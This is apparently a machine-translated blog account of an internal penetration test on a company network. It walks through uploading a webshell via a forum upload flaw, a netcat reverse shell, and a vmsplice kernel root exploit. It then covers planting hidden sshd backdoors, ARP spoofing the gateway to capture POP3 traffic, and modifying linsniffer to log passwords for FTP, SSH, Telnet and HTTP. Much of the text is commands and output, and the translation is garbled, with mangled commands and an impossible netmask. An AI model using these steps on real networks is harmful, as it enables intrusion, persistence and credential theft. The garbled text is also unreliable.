Linux ARP spoofing sniffing internal penetration test

In Linux, the ARP spoofing sniffing internal penetration test has long told the relevant personnel that the smtp and pop protocols for mailbox authentication must be encrypted. Otherwise, it is too easy to be sniffer to the plaintext password on the company's intranet, in addition, the mailbox password is public to bbs, and bbs also uses the http protocol, without https, these are all problems. Although the network we control has been processed, the Linux ARP spoofing sniffing internal penetration test

I have already told the related personnel that the smtp and pop protocols for mailbox authentication should be encrypted. Otherwise, it is too easy for someone to sniffer the plaintext password in the company's intranet. In addition, the mailbox password andBbsPublic, bbs also uses the http protocol, and does not use https, these are all problems. Although the network we control has been processed, the ip address is bound to the mac address. Even if someone spoofs the ip address, the network cannot reach the Gateway after the spoofing, unless it does not go out of the gateway, therefore, it is impossible to sniff the plaintext mailbox password (because the mailbox server is not in the same network segment ). However, for some of our shared resources, the server has a public ip address and an Intranet ip address, which is at a relatively high risk and does not have a network environment with corresponding security policies based on the security level, therefore, some problems are obvious, but some people are not at all. So I conducted a simple internal penetration test.

First, I start with a network segment with a public ip address and an Intranet ip address. For example, the Public ip segment is 222.222.222.0/255.255.255.255.255, and the Intranet ip segment is 192.168.0.0/255.255.255.0.

After stepping on, we found that one of the earlier versions of 222.222.222.77 (192.168.0.77) ranPhpOfForum. After detection, the upload vulnerability exists and the gif89a File Header Spoofing Vulnerability is used to upload a webshell. Then upload an nst.
1:

Use too LsRebound connection:
First, use Nc-L-p 5546 listening port
4:
Click Back connect on the nst.
2: (pay attention to the red part) login successful
3:
: In the local nc window:
Id
Uid = 99 (nobody) gid = 99 (nobody) groups = 99 (nobody)
The permission is low. You can exploit the local privilege escalation vulnerability of the Linux kernel vmsplice some time ago. First upload the Code with nst:
6: (pay attention to the red part. The upload is successful)
Return to the nc window:
CpIn. c/tmp Cd/Tmpls
In. c
Nst_c_bc_c.c
Sess_af927ee319af5d5417b61ac520e53fcf
Ssh-ZeOfP16753
Tunl0gcc-o in. cls
In
In. c
Nst_c_bc_c.c
Sess_af927ee319af5d5417b61ac520e53fcf
Ssh-ZeOfP16753
Tunl0/tmp/in
Bash: no job con TrOl in this shell
[Root @ bbs111 tmp] # id
Uid = 0 (root) gid = 0 (root) groups = 99 (nobody)
[Root @ bbs111 tmp] # It is already the root permission. Next I will upload the frequently used Backdoors that I have modified. I wrote an article about how to keep backdoors, I will not describe it here (replace sshd and part CommandCan hide ports, connections, files, processes, etc ). Clean pp and focus on the next step. We still directly use the backdoor sshd to log on. Or ssh :)
7: Use the rz command in SecureCRT to upload the arpsnifer. c, and then compile: [root @ bbs111 root] # gcc-I/usr/local/include-L/usr/local/lib-o arpsnifer. c-lpcap- LnThe error reported by et may be due to the absence of libnet. See the instructions for Make: first you must install "pcap" and "libnet" to determine that pcap and libnet must be installed in arpsnifer. c. [Root @ bbs111 root] # rpm-ivh libnet-1.1.2.1-2.1.fc2.rf.i386.rpm
[Root @ bbs111 root] # wget http://downloads.sourceforge.net/libpcap/libpcap-0.8.1.tar.gz? Modtime = 1072656000 & big_mirror = 0
[Root @ bbs111 root] # tar zxvf libpcap-0.8.1.tar.gz
[Root @ bbs111 root] # cd libpcap-0.8.1
[Root @ bbs111 libpcap-0.8.1] #./configure
[Root @ bbs111 libpcap-0.8.1] # make
[Root @ bbs111 libpcap-0.8.1] # make install preparation is OK. Next, recompile arpsnifer. c [root @ bbs111 root] # gcc-I/usr/local/include-L/usr/local/lib-o arpsnifer. c-lpcap-lnet does not report an error this time and compilation is successful. [Root @ bbs111 root] #./arpsnifer
==========================================
============= Arp Sniffer ====================
=========== Write by Paris-Ye ============
=== Usage:./arpsnifer-I [interface]-M [Self IP]-W [Work StatIon IP]-S [Server IP]-P [port]
=== ExAmple:
. /Arpsniffer-I eth0-M 192.168.0.6-W 192.168.0.4-S 192.168.0.254 and then start spoofing. Because it is a server, we cheat the Gateway: (the network environment is as follows: The Mail Server ip Address: 192.168.0.11 Gateway: 192.168.0.1 Local Machine: 192.168.0.77) [root @ bbs111 root] #. /arpsniffer-I eth0-M 192.168.0.77-W 192.168.0.1-S 192.168.0.11-P 110
110
110
Get network cards mac DdRess:
M-> 00: 0e: a6: a5: 80: 4f
W-> 00: 0f: e2: 23: 05: d0
S-> 00: d0: b7: 88: 07: 59Now Start... use tcp DuUnder the mp listener: [root @ bbs111 root] # tcp Dump-I eth0 host 192.168.0.11 found data. store the data in the file: [root @ bbs111 root] # Tcpdump-I eth0 host 172.16.0.12-w pop.txt10 minutes later, download pop.txt to local under securecrt, and then use Ethereal for analysis. The plaintext user name and password are found. Next we can use linsniffer to listen to the user name and password we want.
First modify linsniffer. c: Listen to the corresponding application password as needed. My example: if (ntohs (tcp-> dest) = 21) p = 1 ;/* Ftp*/
If (ntohs (tcp-> dest) = 22) p = 1;/* ssh for comparison add EdFor example only comment out if desired */
If (ntohs (tcp-> dest) = 23) p = 1 ;/* Telnet*/
If (ntohs (tcp-> dest) = 80) p = 1;/* http */
If (ntohs (tcp-> dest) = 110) p = 1;/* pop3 */
If (ntohs (tcp-> dest) = 513) p = 1;/* rlogin */
If (ntohs (tcp-> dest) = 106) p = 1;/* pop Passwd*/[Root @ bbs111 root] # gcc-o linsniffer. c
In FileEncoded from/usr/include/linux/tcp. h: 21,
From linsniffer. c: 32:
/Usr/include/asm/byteorder. h: 6: 2: warning: # warning using private kernel header; include Instead! Run the compiled linsniffer directly without warning. [Root @ bbs111 root] #./The username and password of linsniffer are automatically stored in tcp. log. 8: after the test, we sent the user name and password of a person to someone. I believe he will not take it for granted that sniffer is impossible. Next, we will use the password we sniffed to create a password table for a new round of further Intranet penetration tests. We believe that our network security will be greatly improved after we carry out the security technical transformation and security management standardization system transformation based on the penetration test results.